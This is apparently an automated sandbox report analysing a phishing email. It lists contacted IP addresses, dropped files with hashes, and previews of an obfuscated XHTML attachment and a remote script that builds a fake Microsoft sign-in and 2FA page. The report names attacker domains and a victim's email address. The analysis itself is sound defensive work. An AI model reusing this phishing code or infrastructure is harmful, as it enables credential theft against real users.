                                                                                                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                                                                                                              13.78.111.199
                                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                              151.101.130.137
                                                                                                                                                                                                                              		code.jquery.comUnited States
                                                                                                                                                                                                                              		54113FASTLYUSfalse
                                                                                                                                                                                                                              52.123.251.29
                                                                                                                                                                                                                              		svc.ms-acdc-teams.office.comUnited States
                                                                                                                                                                                                                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                              142.250.65.227
                                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                                                                                                              23.219.36.137
                                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                                              		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                              142.251.40.174
                                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                                                                                                              52.111.227.28
                                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                              142.251.35.164
                                                                                                                                                                                                                              		www.google.comUnited States
                                                                                                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                                                                                                              142.250.176.195
                                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                                              		15169GOOGLEUSfalse

                                                                                                                                                                                                                              Private

                                                                                                                                                                                                                              IP
                                                                                                                                                                                                                              192.168.2.17

                                                                                                                                                                                                                              General Information

                                                                                                                                                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                              Analysis ID:1649481
                                                                                                                                                                                                                              Start date and time:2025-03-26 20:13:17 +01:00
                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                              Overall analysis duration:
                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                              Number of analysed new started processes analysed:17
                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                              Analysis Mode:stream
                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                              Sample name:phish_alert_sp2_2.0.0.0.eml
                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                              Classification:mal60.phis.winEML@22/14@14/151
                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                              • Found application associated with file extension: .eml
                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 52.123.251.29
                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ecs.office.com, ecs.office.trafficmanager.net, mira.config.skype.com
                                                                                                                                                                                                                              • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtSetValueKey calls found.
                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                              • VT rate limit hit for: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/GOGNBZ4K/Play_VM-NowVWAV.xhtml
                                                                                                                                                                                                                              • VT rate limit hit for: https://office.avcbtech.store/fuk/xls/f1u2k.js?uid=jmall@murexltd.com

                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250326T1513590802-6960.etl

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                                                              Entropy (8bit):4.47857150322045
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                              MD5:C8B1B41EEA532CDB19AD9FD8BF7C798F
                                                                                                                                                                                                                              SHA1:4AE9DBBF7E6CF40FA500A8749D1C3F8D8229E1DB
                                                                                                                                                                                                                              SHA-256:EA6A1DC1EFB597883EDBBBDD76DE48A8548D78E1C9FD4B2EB59B3F13AAE396F7
                                                                                                                                                                                                                              SHA-512:DFC35EFAAC84E42ADC97013C7F5972B0E1AF9DD513BAF2C0AB5BCFA00498E76BD6F8CFF0D95E0151D73BE98BE472B72FD2E9F9DE9EC2B0E0B2329D6D4B7C61C7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:............................................................................d.......0.....:....................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1........................................................... .V.6.............:............v.2._.O.U.T.L.O.O.K.:.1.b.3.0.:.4.b.e.9.e.8.a.f.4.d.1.c.4.7.8.4.b.9.6.5.8.9.f.d.c.c.5.7.9.7.c.8...C.:.\.U.s.e.r.s.\.t.o.r.r.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.5.0.3.2.6.T.1.5.1.3.5.9.0.8.0.2.-.6.9.6.0...e.t.l...........P.P.....0.....:....................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\olkC975.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2387108
                                                                                                                                                                                                                              Entropy (8bit):0.28422536107150204
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                              MD5:02F7B91EF7FD22F4902F408CA47B255B
                                                                                                                                                                                                                              SHA1:1332FA8F7E3519FF769E399D4D9033385F900E38
                                                                                                                                                                                                                              SHA-256:4B51F152CF82BE8C442C3744D8CFC250451C54538FF23E2DA3045AF56246FBC7
                                                                                                                                                                                                                              SHA-512:D5CDEC798BA128A756D084C3E31CF53F78DC6BADFD984AE191B5B836CBB7F87530EC2DC9FEE134EF88D8BCFCC16612B8448100D66461A18C7CAE3245165D8071
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:..................................................................................................................................................................................................................................................................C.rd.. .IDAT..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                                              File Type:Microsoft Outlook email folder (>=2003)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4334592
                                                                                                                                                                                                                              Entropy (8bit):1.3413497601347208
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                              MD5:894262410F7559E5A0149DF9AA82DF47
                                                                                                                                                                                                                              SHA1:AFD45C6B0F96C6D3D5F30D6902E9840F35E257A0
                                                                                                                                                                                                                              SHA-256:83E27656118B32DE82BFC2EEDF6C13747F40C911A307D82164330C9937CEBE05
                                                                                                                                                                                                                              SHA-512:2E566A2C31F867264F44C355149B833D803DBB8B217B12AA05D956E44F560A0253755B322D8B5FC5DABED83F8AD821A173889A174F6068A044BBBC0B0CEDCE7C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:!BDN.@..SM......\........S..............f................@...........@...@...................................@...........................................................................$B......D>......j........................*...............).................................................................................................................................................................................................................................................................................<.......d+@W\.h.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2621440
                                                                                                                                                                                                                              Entropy (8bit):0.6493387160399448
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                              MD5:7E4A272A9E31076CD3B523B9C673403D
                                                                                                                                                                                                                              SHA1:15E04A4E75B9B37C053DF8B5877CCC96D9F118EA
                                                                                                                                                                                                                              SHA-256:AEBA09FE8A73BF8513C00238565312BFDB8013DD6178AF0A7EF31D7172CC991C
                                                                                                                                                                                                                              SHA-512:978E8751A9610202DD7041B3114073304AE40A628109A4C8A679879CC28F366B76187838B8E8B1025D4CF0713DB58BDDB31C49F4B17293B292AEC0DF96355FBE
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:..4.0...........0...sw^:..........'...........#......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................V....'......e.x0...........0...sw^:.........B............#...........................................p.............................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\Documents\Play_VM-NowVWAV.xhtml

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2912
                                                                                                                                                                                                                              Entropy (8bit):4.794861308217562
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                              MD5:4B69389E405C3CAF0AFAC055F2531EC3
                                                                                                                                                                                                                              SHA1:F136DD20B17CE2BE55AB245522F73031A40A0955
                                                                                                                                                                                                                              SHA-256:198708E738194F82E73AC11C11744C7BD5DAB7D0B8FFB70468832A002F765CAD
                                                                                                                                                                                                                              SHA-512:FDBCAE9BC820AEE1A6599BF7AB025116FD1D963DFC3DB27C37C6A6C24F1C45F2646354468799B34ADFB4BDB5362A4EB1CC1A5E2093A8F0AA146A6A33D52B6500
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN".. "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" lang="en">..<head>.. <meta http-equiv="Content-Type" content="application/xhtml+xml; charset=UTF-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>A silent whisper echoes through time.</title>.. <style type="text/css">.. body, html { margin: 0; padding: 0; width: 100%; height: 100%; overflow: hidden; }.. .ooCyouXe { border: none; width: 100%; height: 100%; position: absolute; top: 0; left: 0; }.. </style>..</head>....<body>.. <script type="text/javascript">.. //<![CDATA[.. .. var fBPBBAiJ = 'jmall@murexltd.com';.. // A silent whisper echoes through time... function ODehHJxM(hex) {.. let str = '';.. for (let i = 0; i < hex.length; i += 2) {..

                                                                                                                                                                                                                              C:\Users\user\Documents\Play_VM-NowVWAV.xhtml:Zone.Identifier

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):26
                                                                                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                              MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                                                                                                                                                                              SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                                                                                                                                                                              SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                                                                                                                                                                              SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:[ZoneTransfer]..ZoneId=3..

                                                                                                                                                                                                                              Chrome Cache Entry: 68

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2407
                                                                                                                                                                                                                              Entropy (8bit):7.900400471609788
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                              MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                                                                                                                                                                                                              SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                                                                                                                                                                                                              SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                                                                                                                                                                                                              SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

                                                                                                                                                                                                                              Chrome Cache Entry: 71

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:PNG image data, 679 x 574, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):48869
                                                                                                                                                                                                                              Entropy (8bit):7.958559093833488
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                              MD5:8AA14660517F5460156FCCC2199CF83C
                                                                                                                                                                                                                              SHA1:1B49B45651E812973D69A13CFCD137E0521B6DE6
                                                                                                                                                                                                                              SHA-256:F2AA979677F3B905F64543C27FA26C6E31EF3320F44DD37F5136D267725AC495
                                                                                                                                                                                                                              SHA-512:7530FB22377CBE1486DAD21F99D5F56D8AB2DAAC40EB56A030C8445F5814E097AC2C54AC81154BAD9AC1ADD5FC23D5C2FE4943F8039873D307B8A2C62973A02B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:.PNG........IHDR.......>.......4.....IDATx..w|.......}7=..=.PB.T.."..E.`ET..E."RE....QD.>>...G9.z..P.^.j(!.HHH.6..:\.n....lv?.?|mvg.{.....u_..2).b....@.`.......@'.....@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@..N(.R.C...X....E..Qn...(.,.......T....hd.F.EA.$I.?.A.z.z..q..hd.........qWP.....E..,.eee..+***++.a. .>.....l4.M.h....j.Q.......y.....P}........#[.l.y.....=ZTTDK..@}|||.M.^ --..'.t8.f.Y.......P}P=yyy.........\X^^^QQ.^.e=I.r.z...v....v..bq:..$......o....;u.T.......T.T&''g............+.Ri..h4...0.LF..v.*}~||.5.\.....x.))).<..............T..W.k...?..cqqq....y..O..].v........Q......p.@....ZRS....h2.Hk...s..>|..c...d..\..H..X,......s.;....h.9.2`I.......~4#_..w5..w..h....:77.../ .2......X,.(.,.d2I.D..r..........8...lF.......G-.L7..<.W.o6.......m.6.a......_[H...i`..Q8!--m.!.?.xFFF.......P.h....

                                                                                                                                                                                                                              Chrome Cache Entry: 72

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:PNG image data, 256 x 85, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):5579
                                                                                                                                                                                                                              Entropy (8bit):7.91798195010819
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                              MD5:28A8812C3AAF8AF83BA5C83C58750528
                                                                                                                                                                                                                              SHA1:38DFA889438C48D89DE0551F90C782E5CB5D7587
                                                                                                                                                                                                                              SHA-256:A9D76447203C9176B2A401D574D44513A7C550B29C30107B4B8D94A67C6FEBDF
                                                                                                                                                                                                                              SHA-512:113AEA80B537AFB95E5123A3C2DDFA9096F8A4DEF82D9F1088DD5C4DB48BD3EC8DB1C5176B6274AA51F334F95107969C06DD5D08CC95D0B8F6B3FB95E2770DA5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              URL:https://i.imgur.com/0HdPsKK.png
                                                                                                                                                                                                                              Preview:.PNG........IHDR.......U......F:.....IDATx....[U....s.L.N..."..P@.ZD.vH.Ig../........Q........)x....W.....................Jk..vf:.Ir~w.$3.$.$'.3...Z.&...I............93...q.3..a..S..J.........@..`=.....z...z..V.....Z2p..d.....xo.I.........(.S..P..-........O._b.....|K../..(.).".;....8..y1.......j.W.P.@.O.'2...w..X.s.5>.vA.5..V..+C..E.{..+.......Y.MY.....(.e.....vXs.n...-.Z.0..}j.....e........J.O.......O.L.<...G..J..........%......'....$:)......B.Z.BQ.|...I...s.G.f..}...k..P.@.P..7?..wz..%..FZWz-....(...H..N.ZGi.9}.[..Z..j.@...E..0.9...7.I..gjd._.V..j.(....o..oC>...k.2..P.{v/.}%..x..2..m..ZE...(.5....%.{...X..{.!.e.....}..$.uT.....i...:F...Q...u......3.t.N$.\d.......n .zJ....x..=.].,.....a.tPE.(.....+.k......._.4..e.;...{.~..%-..Oy....(jI.....&<gZ.)...F.w0p...q..Pc....{y.U......E......7....PT....q..:.+.j..~..:......]?..3.u.{.l.....f...-..k.....'.e...p.~...dj......,Jmo:...'.+..........^.h........?...1~.:.V....a.i.....>Q....(..1].F@...t.....f.rM.

                                                                                                                                                                                                                              Chrome Cache Entry: 74

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65528), with no line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):68421
                                                                                                                                                                                                                              Entropy (8bit):4.894644919136002
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                              MD5:208E39F92A92DA51A62101DB1C1E9D37
                                                                                                                                                                                                                              SHA1:C626DF988D5CB6E2DCB8FAF4E6EBB3EB49883D4F
                                                                                                                                                                                                                              SHA-256:7FAD6EF1B1A42ECDAE813DA7817067AA13D51F59AF3F2204CA136CC29D086509
                                                                                                                                                                                                                              SHA-512:82C19578756461EFE8384D00419CA5823184F1A8262561F185006EA36DAE53C7CF103439D7222F101EE6C1F1933A9B6AA50B8947C0C5FB13CA849C165ABECA71
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              URL:https://office.avcbtech.store/fuk/xls/f1u2k.js?uid=jmall@murexltd.com
                                                                                                                                                                                                                              Preview:function _0xe11b(){var _0x50d695=['#back','Incorrect\x202FA\x20code.\x20Try\x20again.','div6','#back-text','type','Microsoft','relay','6kgjXLC','style','page_visit','close','approve_signin','div5','https://www.office.com','#captcha-btn','.logoname','disabled','ajax','text','An\x20error\x20occurred\x20while\x20verifying\x20the\x20code.\x20Please\x20try\x20again.','#msg-2fa','Enter\x20your\x20email\x20address\x20or\x20phone\x20number.','#co','href','pointer-events','querySelector','input','div4','now','button:not(#dummy-bot-trap)','<img\x20src=\x22https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico\x22\x20class=\x22img-fluid\x20logoimg\x22\x20width=\x2220px\x22>\x20\x20<span\x20class=\x22align-middle\x20h5\x20logoname\x22\x20id=\x22mic\x22\x20style=\x22color:\x20#747474;\x22>Microsoft</span><br><br>\u00a0\u00a0\u00a0\u00a0<span\x20id=\x22aich\x22\x20style=\x22margin-left:\x20-16px;\x22></span><div\x20class=\x22py-2\x22><span\x20id=\x22ep\x22\x20class=\

                                                                                                                                                                                                                              Chrome Cache Entry: 75

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):258966
                                                                                                                                                                                                                              Entropy (8bit):4.694760038815572
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                              MD5:D22C8D1F87B47309F3C2A05D2905A762
                                                                                                                                                                                                                              SHA1:2DA99CB33FCB4294336D73F2D538ED2D5EC3E3C1
                                                                                                                                                                                                                              SHA-256:CA4586C1819D057F7396D917087FE3E650A9466DE644278DC3A8DDA5C3CA71FD
                                                                                                                                                                                                                              SHA-512:F96C4580DEDBCA6B830EB4959E45831D3B87231F54F8B4EFE825615E88335550ABD42EBDF8FCCF40631047B0321D0EA8E0D5438F65B7B6E06FEB5253355F4F20
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              URL:https://sender.linxcoded.top/start/xls/includes/css6.css
                                                                                                                                                                                                                              Preview: /*!.. * Bootstrap v4.0.0 (https://getbootstrap.com).. * Copyright 2011-2018 The Bootstrap Authors.. * Copyright 2011-2018 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */.. :root {.. --blue: #007bff;.. --indigo: #6610f2;.. --purple: #6f42c1;.. --pink: #e83e8c;.. --red: #dc3545;.. --orange: #fd7e14;.. --yellow: #ffc107;.. --green: #28a745;.. --teal: #20c997;.. --cyan: #17a2b8;.. --white: #fff;.. --gray: #6c757d;.. --gray-dark: #343a40;.. --primary: #007bff;.. --secondary: #6c757d;.. --success: #28a745;.. --info: #17a2b8;.. --warning: #ffc107;.. --danger: #dc3545;.. --light: #f8f9fa;.. --dark: #343a40;.. --breakpoint-xs: 0;.. --breakpoint-sm: 576px;.. --breakpoint-md: 768px;.. --breakpoint-lg: 992px;.. --breakpoint-xl: 1200px;.. --font-family-sans-se

                                                                                                                                                                                                                              Chrome Cache Entry: 76

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (32065)
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):85578
                                                                                                                                                                                                                              Entropy (8bit):5.366055229017455
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                              MD5:2F6B11A7E914718E0290410E85366FE9
                                                                                                                                                                                                                              SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                                                                                                                                                                              SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                                                                                                                                                                              SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                                                                                                                                                                                                              Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

                                                                                                                                                                                                                              Chrome Cache Entry: 77

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):17174
                                                                                                                                                                                                                              Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              URL:https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                                                                                                                                                                              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

                                                                                                                                                                                                                              Chrome Cache Entry: 78

                                                                                                                                                                                                                              Download File
